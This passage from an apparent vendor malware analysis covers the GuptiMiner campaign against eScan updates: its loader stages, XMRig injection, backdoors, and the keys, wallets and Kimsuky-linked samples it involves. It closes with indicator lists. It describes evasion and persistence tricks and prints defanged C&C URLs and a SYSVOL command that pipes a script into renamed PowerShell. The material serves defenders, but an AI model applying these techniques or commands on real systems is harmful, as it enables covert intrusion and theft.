  • SYSTEM\CurrentControlSet\Control\CMF\Els 
  • SYSTEM\CurrentControlSet\Control\CMF\ASN 
  • SYSTEM\CurrentControlSet\Control\MSDTC\BSR 

Stage 2 – Gzip Loader 

357009a70daacfc3379560286a134b89e1874ab930d84edb2d3ba418f7ad6a0b
(2019-04-02 07:30:21 UTC) 

This stage is the shortest, the Gzip loader, which is extracted and executed by the shellcode from the PNG file, is a simple PE that decompresses another shellcode using Gzip and executes it in a separate thread. 

This thread additionally loads Stage 3, which we call Puppeteer, that orchestrates the core functionality of the malware – the cryptocurrency mining as well as, when applicable, deploying backdoors on the infected systems. 

Throughout the GuptiMiner operations, Gzip loader has not been changed with later versions. 

Stage 3 – Puppeteer

364984e8d62eb42fd880755a296bd4a93cc071b9705c1f1b43e4c19dd84adc65
(2019-03-15 10:07:36 UTC) 

Let’s now look at the biggest Stage 3, the Puppeteer. It pulls its strings everywhere across the infected system, manipulating the GuptiMiner components to do its bidding, hence the name we’ve chosen. It orchestrates further actions and deploys two core components of the malware – an XMRig coinminer and two types of backdoors that target devices present in large corporate networks. Of course, Puppeteer also introduces additional tricks to the arsenal of the whole GuptiMiner operation. 

This stage also uses one of the many Global\SLDV mutexes which we described in the Mutex timeline. For example, this particular sample uses SLDV01 as its mutex.

Puppeteer Setup

Puppeteer performs several steps for a proper setup. Firstly, it adds a new power scheme in Windows so the PC does not go to sleep. If the CPU has only one core (anti-VM) or the mutex already exists, the malware ceases to function by going to infinite sleep. 

In the next phase, the malware kills all the processes with a name msiexec.exe, cmstp.exe, or credwiz.exe. After that, it creates a separate thread that injects XMRig into a credwiz.exe process freshly created by the malware. The malware also disables Windows Defender by setting its service start status to disabled. 

For the persistence, Puppeteer chose an interesting approach. Firstly, it creates a scheduled task with the following configuration: 

  • A legitimate rundll32.exe file is copied and renamed into C:\ProgramData\Microsoft\Crypto\Escan\dss.exe and this file is executed from the scheduled task 
  • The malicious DLL is placed to C:\ProgramData\Microsoft\Crypto\Escan\updll3.dll3 and this file is loaded by dss.exe (exported function ValidateFile
  • The task is executed with every boot (TASK_TRIGGER_BOOT) and TASK_RUNLEVEL_HIGHEST priority 
  • The task is named and located at C:\Windows\system32\tasks\Microsoft\windows\autochk\ESUpgrade 

With that, the malware copies the content of updll3.dll3 into memory and deletes the original file from disk. Puppeteer then waits for a system shutdown (similarly to Stage 0.9) by waiting for SM_SHUTTINGDOWN metric to be set to non-zero value, indicating the shutdown. This is checked every 100 milliseconds. Only when the shutdown of the system is initiated, the malware reintroduces the updll3.dll3 file back onto disk. 

Putting the malicious DLL back just before the system restart is really sneaky but also has potentially negative consequences. If the victim’s device encounters a crash, power outage, or any other kind of unexpected shutdown, the file won’t be restored from memory and Puppeteer will stop working from this point. Perhaps this is the reason why authors actually removed this trick in later versions, trading the sophistication for malware’s stability.

A code ensuring the correct after-reboot execution

The repetitive loading of updll3.dll3, as seen in the code above, is in fact Puppeteer’s update process. The DLL will ultimately perform steps of requesting a new PNG shellcode from the C&C servers and if it is a new version, the chain will be updated. 

XMRig Deployment 

During the setup, Puppeteer created a separate thread for injecting an XMRig coinminer into credwiz.exe process. Before the injection takes place, however, a few preparation steps are performed. 

The XMRig configuration is present directly in the XMRig binary (standard JSON config) stored in the Puppeteer binary. This configuration can be, however, modified to different values on the fly. In the example below, we can see a dynamic allocation of mining threads depending on the robustness of the infected system’s hardware. 

Patching the XMRig configuration on the fly, dynamically assigning mining threads

The injection is standard: the malware creates a new suspended process of credwiz.exe and, if successful, the coinmining is injected and executed by WriteProcessMemory and CreateRemoteThread combo. 

Puppeteer continuously monitors the system for running process, by default every 5 seconds. If it encounters any of the monitoring tools below, the malware kills any existing mining by taking down the whole credwiz.exe process as well as it applies a progressive sleep, postponing another re-injection attempt by additional 5 hours. 

  • taskmgr.exe 
  • autoruns.exe 
  • wireshark.exe 
  • wireshark-gtk.exe 
  • tcpview.exe 

Furthermore, the malware needs to locate the current updll3.dll3 on the system so its latest version can be stored in memory, removed from disk, and dropped just before another system restart. Two approaches are used to achieve this: 

  • Reading eScan folder location from HKEY_LOCAL_MACHINE\SOFTWARE\AVC3 
  • If one of the checked processes is called download.exe, which is a legitimate eScan binary, it obtains the file location to discover the folder. The output can look like this: 
    • \Device\HarddiskVolume1\Program Files (x86)\eScan\download.exe 

The check for download.exe serves as an alternative for locating eScan installation folder and the code seems heavily inspired by the example code of Obtaining a File Name From a File handle on MSDN. 

Finally, Puppeteer also continuously monitors the CPU usage on the system and tweaks the core allocation in such a way it is not that much resource heavy and stays under the radar. 

Backdoor Setup

4dfd082eee771b7801b2ddcea9680457f76d4888c64bb0b45d4ea616f0a47f21
(2019-06-29 03:38:24 UTC) 

The backdoor is set up by the previous stage, Puppeteer, by first discovering whether the machine is operating on a Windows Server or not. This is done by checking a DNS Server registry key (DNS Server service is typically running on a Windows Server edition):
SOFTWARE\Microsoft\Windows NT\CurrentVersion\DNS Server 

After that, the malware runs a command to check and get a number of computers joined in a domain:
net group “domain computers” /domain

The data printed by the net group command typically uses 25 characters per domain joined computer plus a newline (CR+LF) per every three computers, which can be illustrated by the example below: 

Example output of net group command

In this version of the backdoor setup, Puppeteer checks whether the number of returned bytes is more than 100. If so, Puppeteer assumes it runs in a network shared with at least five computers and downloads additional payloads from a hardcoded C&C (https://m.airequipment[.]net/gpse/) and executes it using PowerShell command. 

Note that the threshold for the number of returned bytes was different and significantly higher in later versions of GuptiMiner, as can be seen in a dedicated section discussing Modular Backdoor, resulting in compromising only those networks which had more than 7000 computers joined in the same domain! 

If the checks above pass, Puppeteer uses a PowerShell command for downloading and executing the payload and, interestingly, it is run both in the current process as well as injected in explorer.exe

Furthermore, regardless of whether the infected computer is present in a network of a certain size or not, it tries to download additional payload from dl.sneakerhost[.]com/u as well. This payload is yet another PNG file with the appended shellcode. We know this because the code uses the exact same parsing from the specific offset 0x325 of the PNG file as described in Stage 1. However, during our analysis, this domain was already taken down and we couldn’t verify what kind of payload was being distributed here. 

The Puppeteer’s backdoor setup process was improved and tweaked multiple times during its long development. In the upcoming subsections, we will focus on more important changes, mostly those which influence other parts of the malware or present a whole new functionality. 

Later Puppeteer Versions 

In later versions, the attackers switched to the datetime mutex paradigm (as illustrated in Mutexes in Time section) and also introduced additional process monitoring of more Sysinternals tools like Process explorer, Process monitor, as well as other tools like OllyDbg, WinDbg, and TeamViewer. 

Pool Configuration

487624b44b43dacb45fd93d03e25c9f6d919eaa6f01e365bb71897a385919ddd
(2023-11-21 18:05:43 UTC) 

Additionally, the GuptiMiner authors also started to modify pool addresses in XMRig configurations with a new approach. They started using subdomains by “r” and “m” depending on the available physical memory on the infected system. If there is at least 3 GB of RAM available, the malware uses:
m.domain.tld with auto mode and enabled huge pages.

If the available RAM is lesser than 3 GB, it uses:
r.domain.tld with light mode and disabled huge pages.

In order to not keep things simple, the authors later also started to use “p” as a subdomain in some versions, without any specific reason for the naming convention (perhaps just to say it is a “pool”). 

The usage of all such domains in time can be seen in the Domains timeline

Variety in Used DLLs 

Puppeteer used many different names and locations of DLLs over the years for sideloading or directly loading using scheduled tasks. For example, these might be: 

  • C:\Program Files (x86)\eScan\updll3.dll3 
  • C:\Program Files\Common Files\SYSTEM\SysResetErr\SysResetErr.DLL 
  • C:\Program Files\Microsoft SQL Server\SpellChecking\MsSpellChecking.DLL 
  • C:\Program Files\Microsoft SQL Server\SpellChecking\MsSpellCheckingHost.DLL 
  • C:\ProgramData\AMD\CNext\atiadlxx.dll 
  • C:\ProgramData\Microsoft\Assistance\LunarG\vulkan-1.dll 
  • C:\ProgramData\Microsoft\Crypto\Escan\updll3.dll 
  • C:\ProgramData\Microsoft\Crypto\Escan\updll3.dll3 
  • C:\ProgramData\Microsoft\Network\Escan\AutoWake.dll 

Puppeteer Cleanup 

1c31d06cbdf961867ec788288b74bee0db7f07a75ae06d45d30355c0bc7b09fe
(2020-03-09 00:57:11 UTC)

We’ve also seen “cleaner” Puppeteers, meaning they didn’t contain the setup process for backdoors, but they were able to delete the malicious DLLs from the system when a running monitoring tool was detected. 

Deploy Per-Quarter 

1fbc562b08637a111464ba182cd22b1286a185f7cfba143505b99b07313c97a4
(2021-03-01 10:43:27 UTC) 

In this particular version, the deployment of the backdoor was performed once every 3 months, indicating a per-quarter deployment.

The deployment happens at March, June, September, and December

Stage 4 – Backdoor 

Since no one who puts such an effort into a malware campaign deploys just coinminers on the infected devices, let’s dig deeper into additional sets of GuptiMiner’s functionalities – deploying two types of backdoors on the infected devices.

PuTTY Backdoor 

07beca60c0a50520b8dbc0b8cc2d56614dd48fef0466f846a0a03afbfc42349d
(2021-03-01 10:31:33 UTC)

E:\Projects\putty-src\windows\VS2012\x64\Release\plink.pdb

One of the backdoors deployed by GuptiMiner is based on a custom build of PuTTY Link (plink). This build contains an enhancement for local SMB network scanning, and it ultimately enables lateral movement over the network to potentially exploit Windows 7 and Windows Server 2008 machines by tunneling SMB traffic through the victim’s infected device. 

Local SMB Scanning 

First, the plink binary is injected into netsh.exe process by Puppeteer with the Deploy per-quarter approach. After a successful injection, the malware discovers local IP ranges by reading the IP tables from the victim’s device, adding those into local and global IP range lists. 

With that, the malware continues with the local SMB scanning over the obtained IP ranges: xx.yy.zz.1-254. When a device supporting SMB is discovered, it is saved in a dedicated list. The same goes with IPs that don’t support SMB, effectively deny listing them from future actions. This deny list is saved in specific registry subkeys named Sem and Init, in this location:
HKEY_LOCAL_MACHINE \SYSTEM\CurrentControlSet\Control\CMF\Class
where Init contains the found IP addresses and Sem contains their total count. 

There are conditions taking place when such a scan is performed. For example, the scan can happen only when it is a day in the week (!), per-quarter deployment, and only at times between 12 PM and 18 PM. Here, we denoted by (!) a unique coding artefact in the condition, since checking the day of the week is not necessary (always true). 

Questionable conditioning for SMB scanning

Finally, the malware also creates a new registry key HKEY_LOCAL_MACHINE\SYSTEM\RNG\FFFF three hours after a successful scan. This serves as a flag that the scanning should be finished, and no more scanning is needed. 

An even more interesting datetime-related bug can be seen in a conditioning of RNG\FFFF registry removal. The removal is done to indicate that the malware can perform another SMB scan after a certain period of time. 

As we can see in the figure below, the malware obtains the write time of the registry key and the current system time by SystemTimeToVariantTime API function and subtracts those. The subtraction result is a floating-point number where the integral part means number of days. 

Furthermore, the malware uses a constant 60*60*60*24=5184000 seconds (60 days) in the condition for the registry key removal. However, the condition is comparing VariantTime (days) with seconds. Thus, the backdoor can activate every 51.84 days instead of the (intended?) 60 days. A true blessing in disguise. 

Removal of RNG\FFFF key, deploying the backdoor after 51.84 days

Lateral Movement Over SMB Traffic 

After the local SMB scan is finished, the malware checks from the received SMB packet results whether any of the IP addresses that responded are running Windows 7 or Windows Server 2008. If any such a system is found on the local network, the malware adds these IP addresses to a list of potential targets. 

Furthermore, GuptiMiner executes the main() legacy function from plink with artificial parameters. This will create a tunnel on the port 445 between the attacker’s server gesucht[.]net and the victim’s device. 

Parameters used for plink main() function

This tunnel is used for sending SMB traffic through the victim’s device to the IP addresses from the target list, enabling lateral movement over the local network. 

Note that this version of Puppeteer, deploying this backdoor, is from 2021. We also mentioned that only Windows 7 and Windows Server 2008 are targeted, which are rather old. We think this might be because the attackers try to deploy an exploit for possible vulnerabilities on these old systems. 

To orchestrate the SMB communication, the backdoor hand-crafts SMB packets on the fly by modifying TID and UID fields to reflect previous SMB communication. As shown in the decompiled code below, the SMB packet 4, which is crafted and sent by the malware, contains both TID and UID from the responses of the local network device. 

The backdoor hand-crafts SMB packets on the fly

Here we provide an example how the SMB packets look like in Wireshark when sent by the malware. After the connection is established, the malware tries to login as anonymous and makes requests for \IPC$ and a named pipe.

SMB traffic captured by Wireshark

Interested reader can find the captured PCAP on our GitHub.

Modular Backdoor 

f0ccfcb5d49d08e9e66b67bb3fedc476fdf5476a432306e78ddaaba4f8e3bbc4
(2023-10-10 15:08:36 UTC) 

Another backdoor that we’ve found during our research being distributed by Puppeteer is a modular backdoor which targets huge corporate networks. It consists of two phases – the malware scans the devices for the existence of locally stored private keys and cryptocurrency wallets, and the second part is an injected modular backdoor, in the form of a shellcode. 

Checks on Private Keys, Wallets, and Corporate Network

This part of the backdoor focuses on scanning for private keys and wallet files on the system. This is done by searching for .pvk and .wallet files in these locations: 

  • C:\Users\* 
  • D:\* 
  • E:\* 
  • F:\* 
  • G:\* 

If there is such a file found in the system, its path is logged in a newly created file C:\Users\Public\Ca.txt. Interestingly, this file is not processed on its own by the code we have available. We suppose the data will be stolen later when further modules are downloaded by the backdoor. 

The fact that the scan was performed is marked by creating a registry key:
HKEY_LOCAL_MACHINE\SYSTEM\Software\Microsoft\DECLAG 

If some private keys or wallets were found on the system or the malware is running in a huge corporate environment, the malware proceeds with injecting the backdoor, in a form of a shellcode, into the mmc.exe process. 

The size of the corporate environment is guessed by the same approach as Puppeteer’s backdoor setup with the difference in the scale. Here, the malware compares the returned list of computers in the domain with 200,000 characters. To recapitulate, the data printed by the net group command uses 25 characters per domain joined computer plus a newline (CR+LF) per every three computers. 

Example output of net group command

This effectively means that the network in which the malware operates must have at least 7781 computers joined in the domain, which is quite a large number.

Backdoor

8446d4fc1310b31238f9a610cd25ea832925a25e758b9a41eea66f998163bb34 

This shellcode is a completely different piece of code than what we’ve seen so far across GuptiMiner campaign. It is designed to be multi-modular with the capability of adding more modules into the execution flow. Only a networking communication module, however, is hardcoded and available by default, and its hash is 74d7f1af69fb706e87ff0116b8e4fa3a9b87275505e2ee7a32a8628a2d066549 (2022-12-19 07:31:39 UTC)

After the injection, the backdoor decrypts a hardcoded configuration and a hardcoded networking module using RC4. The RC4 key is also hardcoded and available directly in the shellcode. 

The configuration contains details about which server to contact, what ports to use, the length of delays that should be set between commands/requests, among others. The domain for communication in this configuration is www.righttrak[.]net:443 and an IP address 185.248.160[.]141.

Decrypted network module configuration

The network module contains seven different commands that the attacker can use for instructing the backdoor about what to do. A complete list of commands accepted by the network module can be found in the table below. Note that each module that can be used by the backdoor contains such a command handler on its own. 

Command Description 
3.0 Connect 
3.1 Read socket 
3.2 Write socket 
3.3 Close socket 
Close everything 
Return 1 
12 Load configuration 

The modules are stored in an encrypted form in the registry, ensuring their persistence:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCB

The backdoor also uses an import by hash obfuscation for resolving API functions. The hashing function is a simple algorithm that takes each byte of the exported function name, adds 1 to it, and then multiplies the previously calculated number (calculated_hash, starts with 0) by 131 and adds it to the byte:

The server www.righttrak[.]net:443 had, at the time, a valid certificate. Note for example the not-at-all-suspicious email address the authors used. 

Certificate on www.righttrak[.]net:443 as shown by Censys

Other Infection Vectors of Modular Backdoor

af9f1331ac671d241bf62240aa52389059b4071a0635cb9cb58fa78ab942a33b

During our research, we have also found a 7zip SFX executable containing two files: 

  • ms00.dat 
  • notepad.exe 

notepad.exe is a small binary that decrypts ms00.dat file using RC4 with a key V#@!1vw32. The decrypted ms00.dat file is the same Modular Backdoor malware as described above. 

However, we have not seen this SFX executable being distributed by GuptiMiner. This indicates that this backdoor might be distributed by different infection vectors as well. 

Related and Future Research

We’ve also observed other more or less related samples during our research. 

PowerShell Scripts

Interestingly, we’ve found the C&C domain from the backdoor setup phase (in Puppeteer) in additional scripts as well which were not distributed by traditional GuptiMiner operation as we know it. We think this might be a different kind of attack sharing the GuptiMiner infrastructure, though it might be a different campaign. Formatted PowerShell script can be found below: 

A PowerShell script targeting eScan (formatted)

In this case, the payload is downloaded and executed from the malicious domain only when an antivirus is installed, and its name has more than 4 letters and starts with eS. One does not have to be a scrabble champion to figure out that the malware authors are targeting the eScan AV once again. The malicious code is also run when the name of the installed AV has less than 5 letters. 

We’ve found this script being run via a scheduled task with a used command:
"cmd.exe" /c type "\<domain>\SYSVOL\<domain>\scripts\gpon.inc" | "\<domain>\SYSVOL\<domain>\scripts\powAMD64.dat" -nop - 
where powAMD64.dat is a copy of powershell.exe. The task name and location was C:\Windows\System32\Tasks\ScheduledDefrag 

Usage of Stolen Certificates 

We have found two stolen certificates used for signing GuptiMiner payloads. Interestingly, one of the used stolen certificates originates in Winnti operations. In this particular sample, the digital signature has a hash: 
529763AC53562BE3C1BB2C42BCAB51E3AD8F8A56 

This certificate is the same as mentioned by Kaspersky more than 10 years ago. However, we’ve also seen this certificate to be used in multiple malware samples than just GuptiMiner, though, indicating a broader leak. 

A complete list of stolen certificates and their usage can be found in the table below: 

Stolen certificate SHA1 Signed GuptiMiner sample 
529763AC53562BE3C1BB2C42BCAB51E3AD8F8A56 31dfba1b102bbf4092b25e63aae0f27386c480c10191c96c04295cb284f20878 
529763AC53562BE3C1BB2C42BCAB51E3AD8F8A56 8e96d15864ec0cc6d3976d87e9e76e6eeccc23c551b22dcfacb60232773ec049 
31070C2EA30E6B4E1C270DF94BE1036AE7F8616B b0f94d84888dffacbc10bd7f9983b2d681b55d7e932c2d952d47ee606058df54 
31070C2EA30E6B4E1C270DF94BE1036AE7F8616B f656a418fca7c4275f2441840faaeb70947e4f39d3826d6d2e50a3e7b8120e4e 

Possible Ties to Kimsuky 

7f1221c613b9de2da62da613b8b7c9afde2ea026fe6b88198a65c9485ded7b3d
(2021-03-06 20:13:32 UTC) 

During our research, we’ve also found an information stealer which holds a rather similar PDB path as was used across the whole GuptiMiner campaign (MainWork):
F:\!PROTECT\Real\startW-2008\MainWork\Release\MainWork.pdb 

However, we haven’t seen it distributed by GuptiMiner and, according to our data, it doesn’t belong to the same operation and infection chain. This malware performs stealing activities like capturing every keystroke, harvesting HTML forms from opened browser tabs, noting times of opened programs, etc., and stores them in log files. 

What is truly interesting, however, is that this information stealer might come from Kimsuky operations. Also known as Black Banshee, among other aliases, Kimsuky is a North Korean state-backed APT group. 

It contains the similar approach of searching for AhnLab real-time detection window class name 49B46336-BA4D-4905-9824-D282F05F6576 as mentioned by both AhnLab as well as Cisco Talos Intelligence in their Information-gathering module section. If such a window is found, it will be terminated/hidden from the view of the infected user. 

Function that searches and terminates AhnLab’s real-time detection window class

Furthermore, the stealer contains an encrypted payload in resources, having a hash: d5bc6cf988c6d3c60e71195d8a5c2f7525f633bb54059688ad8cfa1d4b72aa6c (2021-02-19 19.02.2021 15:00:47 UTC) and it has this PDB path:
F:\PROTECT\Real\startW-2008\HTTPPro\Release\HTTPPro.pdb 

This module is decrypted using the standard RC4 algorithm with the key messi.com. The module is used for downloading additional stages. One of the used URLs are:
http://stwu.mygamesonline[.]org/home/sel.php
http://stwu.mygamesonline[.]org/home/buy.php?filename=%s&key=%s 

The domain mygamesonline[.]org is commonly used by Kimsuky (with variety of subdomains). 

The keylogger also downloads next stage called ms12.acm

The next stage is downloaded with a name ms12.acm

With this, we see a possible pattern with the naming convention and a link to Modular Backdoor. As described in the Other Infection Vectors section, the 7z SFX archive contains an encrypted file called ms00.dat with which we struggle to ignore the resemblance.

Last but not least, another strong indicator for a possible attribution is the fact that the Kimsuky keylogger sample dddc57299857e6ecb2b80cbab2ae6f1978e89c4bfe664c7607129b0fc8db8b1f, which is mentioned in the same blogpost from Talos, contains a section called .vlizer, as seen below: 

Kimsuky keylogger sections

During the GuptiMiner installation process (Stage 0), we wrote about the threat actors introducing Code Virtualization in 2018. This was done by using a dedicated section called .v_lizer

Conclusion 

In this analysis, we described our findings regarding a long-standing threat we called GuptiMiner, in detail. This sophisticated operation has been performing MitM attacks targeting an update mechanism of the eScan antivirus vendor. We disclosed the security vulnerability to both eScan and the India CERT and received confirmation on 2023-07-31 from eScan that the issue was fixed and successfully resolved. 

During the GuptiMiner operation, the attackers were deploying a wide chain of stages and functionalities, including performing DNS requests to the attacker’s DNS servers, sideloading, extracting payloads from innocent-looking images, signing its payloads with a custom trusted root anchor certification authority, among others. 

Two different types of backdoors were discovered, targeting large corporate networks. The first provided SMB scanning of the local network, enabling lateral movement over the network to potentially exploit vulnerable Windows 7 and Windows Server 2008 systems on the network. The second backdoor is multi-modular, accepting commands on background to install more modules as well as focusing on stealing stored private keys and cryptowallets. 

Interestingly, the final payload distributed by GuptiMiner was also XMRig which is a bit unexpected for such a thought-through operation. 

We have also found possible ties to Kimsuky, a notorious North Korean APT group, while observing similarities between Kimsuky keylogger and fragments discovered during the analysis of the GuptiMiner operation. 

eScan follow-up

We have shared our findings and our research with eScan prior to publishing this analysis. For the sake of completeness, we are including their statement on this topic:

“I would also like to highlight some key points:
1. Our records indicate that the last similar report was received towards the end of the year 2019.
2. Since 2020, we have implemented a stringent checking mechanism that utilizes EV Signing to ensure that non-signed binaries are rejected.
3. Multiple heuristic rules have been integrated into our solution to detect and block any instances of legitimate processes being used for mining, including the forking of unsigned binaries.
4. While our internal investigations did not uncover instances of the XRig miner, it is possible that this may be due to geo-location factors.
5. Our latest solution versions employ secure (https) downloads, ensuring encrypted communication when clients interact with our cloud-facing servers for update downloads.”

According to our telemetry, we continue to observe new infections and GuptiMiner builds within our userbase. This may be attributable to eScan clients on these devices not being updated properly.

Indicators of Compromise (IoCs)

In this section, we would like to summarize the Indicators of Compromise mentioned in this analysis. As they are indicators, it doesn’t automatically mean the mentioned files and/or domains are malicious on their own. 

For more detailed list of IoCs of the whole GuptiMiner campaign, please visit our GitHub.

Evolution and Timelines 

Domains 

Domain
_spf.microsoft[.]com
acmeautoleasing[.]net
b.guterman[.]net
breedbackfp[.]com
crl.microsoft[.]com
crl.peepzo[.]com
crl.sneakerhost[.]com
desmoinesreg[.]com
dl.sneakerhost[.]com
edgesync[.]net
espcomp[.]net
ext.microsoft[.]com
ext.peepzo[.]com
ext.sneakerhost[.]com
gesucht[.]net
gesucht[.]net
globalsign.microsoft[.]com
icamper[.]net
m.airequipment[.]net
m.cbacontrols[.]com
m.gosoengine[.]com
m.guterman[.]net
m.indpendant[.]com
m.insomniaccinema[.]com
m.korkyt[.]net
m.satchmos[.]net
m.sifraco[.]com
ns.bretzger[.]net
ns.deannacraite[.]com
ns.desmoinesreg[.]com
ns.dreamsoles[.]com
ns.editaccess[.]com
ns.encontacto[.]net
ns.gravelmart[.]net
ns.gridsense[.]net
ns.jetmediauk[.]com
ns.kbdn[.]net
ns.lesagencestv[.]net
ns.penawarkanser[.]net
ns.srnmicro[.]net
ns.suechiLton[.]com
ns.trafomo[.]com
ns.trafomo[.]com
ns1.earthscienceclass[.]com
ns1.peepzo[.]com
ns1.securtelecom[.]com
ns1.sneakerhost[.]com
p.bramco[.]net
p.hashvault[.]pro
r.sifraco[.]com
spf.microsoft[.]com
widgeonhill[.]com
www.bascap[.]net

Mutexes 

Mutex 
ESOCESS_ 
Global\Fri Aug 13 02:17:49 2021 
Global\Fri Aug 13 02:22:55 2021 
Global\Mon Apr 19 06:03:17 2021 
Global\Mon Apr 24 07:19:54 2023 
Global\Mon Feb 27 08:11:25 2023 
Global\Mon Jun 14 03:22:57 2021 
Global\Mon Mar 13 07:29:11 2023 
Global\Mon Mar 22 09:16:00 2021 
Global\Sun Jun 13 08:22:07 2021 
Global\Thu Aug 10 03:25:11 2023 
Global\Thu Aug 12 02:07:58 2021 
Global\Thu Feb 23 08:37:09 2023 
Global\Thu Mar 25 02:03:14 2021 
Global\Thu Mar 25 09:31:19 2021 
Global\Thu Nov  2 08:21:56 2023 
Global\Thu Nov  9 06:19:40 2023 
Global\Tue Apr 25 08:32:05 2023 
Global\Tue Mar 23 02:37:32 2021 
Global\Tue Oct 10 08:07:11 2023 
Global\Wed Aug 11 09:16:37 2021 
Global\Wed Jan  5 09:15:56 2022 
Global\Wed Jun  2 09:43:03 2021 
Global\Wed Mar  1 01:29:48 2023 
Global\Wed Mar 23 08:56:01 2022 
Global\Wed Mar 23 09:06:36 2022 
Global\Wed May 10 06:38:46 2023 
Global1 
GlobalMIVOD_V4 
GMCM1 
MIVOD_6 
MTX_EX01 
Mutex_ONLY_ME_V1 
Mutex_ONLY_ME_V2 
Mutex_ONLY_ME_V3 
PROCESS_ 
SLDV014 
SLDV02 
SLDV024 
SLDV04 
SLDV10 
SLDV11 
SLDV13 
SLDV15 
SLDV17 
SLDV22 
SLDV26 

PDB paths 

PDB path
E:\projects\projects\RunCompressedSC\x64\Release\RunCompressedSC.pdb
E:\Projects\putty-src\windows\VS2012\x64\Release\plink.pdb
F:\CODE-20221019\Projects\RunCompressedSC\x64\Release\RunCompressedSC.pdb
F:\Pro\MainWork\Release\MainWork.pdb
F:\Pro\MainWork\x64\Release\MainWork.pdb
F:\Projects\2020-NEW\20200307-NEW\MainWork-VS2017-IPHLPAPI\Release\MainWork.pdb
F:\Projects\2020-NEW\20200307-NEW\MainWork-VS2017-IPHLPAPI\x64\Release\MainWork.pdb
F:\Projects\2020-NEW\20200307-NEW\MainWork-VS2017-nvhelper\Release\MainWork.pdb
F:\Projects\2020-NEW\20200307-NEW\MainWork-VS2017-nvhelper\x64\Release\MainWork.pdb
F:\Projects\RunCompressedSC\x64\Release\RunCompressedSC.pdb
F:\V202102\MainWork-VS2017 – Monitor\Release\MainWork.pdb
F:\V202102\MainWork-VS2017 – Monitor\x64\Release\MainWork.pdb
H:\projects\MainWork\Release\MainWork.pdb

Stage 0 – Installation Process 

IoC Note 
http://update3[.]mwti[.]net/pub/update/updll3.dlz  
c3122448ae3b21ac2431d8fd523451ff25de7f6e399ff013d6fa6953a7998fa3 C:\Program Files\eScan\VERSION.DLL 
7a1554fe1c504786402d97edecc10c3aa12bd6b7b7b101cfc7a009ae88dd99c6 updll65.dlz 

Stage 0.9 – Installation Improvements 

Stage 1 – PNG Loader 

IoC Note 
ff884d4c01fccf08a916f1e7168080a2d740a62a774f18e64f377d23923b0297  
ext.peepzo[.]com  
crl.peepzo[.]com  
ns1.peepzo[.]com  
http://www.deanmiller[.]net/m/  
294b73d38b89ce66cfdefa04b1678edf1b74a9b7f50343d9036a5d549ade509a  
185.45.192[.]43/elimp/  
6305d66aac77098107e3aa6d85af1c2e3fc2bb1f639e4a9da619c8409104c414
SYSTEM\CurrentControlSet\Control\Arbiters\Class Registry 
SYSTEM\CurrentControlSet\Control\CMF\Class Registry 
SYSTEM\CurrentControlSet\Control\CMF\CORE Registry 
SYSTEM\CurrentControlSet\Control\CMF\DEF Registry 
SYSTEM\CurrentControlSet\Control\CMF\Els Registry 
SYSTEM\CurrentControlSet\Control\CMF\ASN Registry 
SYSTEM\CurrentControlSet\Control\MSDTC\BSR Registry 

Stage 2 – Gzip Loader 

IoC Note 
357009a70daacfc3379560286a134b89e1874ab930d84edb2d3ba418f7ad6a0b  

Stage 3 – Puppeteer 

Ioc Note 
364984e8d62eb42fd880755a296bd4a93cc071b9705c1f1b43e4c19dd84adc65  
C:\ProgramData\Microsoft\Crypto\Escan\dss.exe  
C:\ProgramData\Microsoft\Crypto\Escan\updll3.dll3   
C:\Windows\system32\tasks\Microsoft\windows\autochk\ESUpgrade Scheduled task 
HKEY_LOCAL_MACHINE\SOFTWARE\AVC3 Registry 
\Device\HarddiskVolume1\Program Files (x86)\eScan\download.exe  
4dfd082eee771b7801b2ddcea9680457f76d4888c64bb0b45d4ea616f0a47f21  
SOFTWARE\Microsoft\Windows NT\CurrentVersion\DNS Server Registry 
net group ”domain computers” /domain Command 
https://m.airequipment[.]net/gpse/  
487624b44b43dacb45fd93d03e25c9f6d919eaa6f01e365bb71897a385919ddd  
C:\Program Files (x86)\eScan\updll3.dll3  
C:\Program Files\Common Files\SYSTEM\SysResetErr\SysResetErr.DLL  
C:\Program Files\Microsoft SQL Server\SpellChecking\MsSpellChecking.DLL  
C:\Program Files\Microsoft SQL Server\SpellChecking\MsSpellCheckingHost.DLL  
C:\ProgramData\AMD\CNext\atiadlxx.dll  
C:\ProgramData\Microsoft\Assistance\LunarG\vulkan-1.dll  
C:\ProgramData\Microsoft\Crypto\Escan\updll3.dll  
C:\ProgramData\Microsoft\Crypto\Escan\updll3.dll3  
C:\ProgramData\Microsoft\Network\Escan\AutoWake.dll  
1c31d06cbdf961867ec788288b74bee0db7f07a75ae06d45d30355c0bc7b09fe  
1fbc562b08637a111464ba182cd22b1286a185f7cfba143505b99b07313c97a4  

Stage 4 – Backdoor 

IoC Note 
07beca60c0a50520b8dbc0b8cc2d56614dd48fef0466f846a0a03afbfc42349d  
E:\Projects\putty-src\windows\VS2012\x64\Release\plink.pdb PDB 
HKEY_LOCAL_MACHINE \SYSTEM\CurrentControlSet\Control\CMF\Class Registry 
HKEY_LOCAL_MACHINE\SYSTEM\RNG\FFFF  Registry 
gesucht[.]net  
f0ccfcb5d49d08e9e66b67bb3fedc476fdf5476a432306e78ddaaba4f8e3bbc4  
HKEY_LOCAL_MACHINE\SYSTEM\Software\Microsoft\DECLAG Registry 
8446d4fc1310b31238f9a610cd25ea832925a25e758b9a41eea66f998163bb34 Shellcode 
74D7F1AF69FB706E87FF0116B8E4FA3A9B87275505E2EE7A32A8628A2D066549  
www.righttrak[.]net:443   
185.248.160[.]141  
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCB Registry 
af9f1331ac671d241bf62240aa52389059b4071a0635cb9cb58fa78ab942a33b  

Related and Future Research 

IoC Note 
“cmd.exe” /c type “\<domain>\SYSVOL\<domain>\scripts\gpon.inc” | “\<domain>\SYSVOL\<domain>\scripts\powAMD64.dat” -nop – Command 
C:\Windows\System32\Tasks\ScheduledDefrag Scheduled task 
529763AC53562BE3C1BB2C42BCAB51E3AD8F8A56 Certificate SHA1 
31070C2EA30E6B4E1C270DF94BE1036AE7F8616B Certificate SHA1 
31dfba1b102bbf4092b25e63aae0f27386c480c10191c96c04295cb284f20878  
8e96d15864ec0cc6d3976d87e9e76e6eeccc23c551b22dcfacb60232773ec049  
b0f94d84888dffacbc10bd7f9983b2d681b55d7e932c2d952d47ee606058df54  
f656a418fca7c4275f2441840faaeb70947e4f39d3826d6d2e50a3e7b8120e4e  
7f1221c613b9de2da62da613b8b7c9afde2ea026fe6b88198a65c9485ded7b3d  
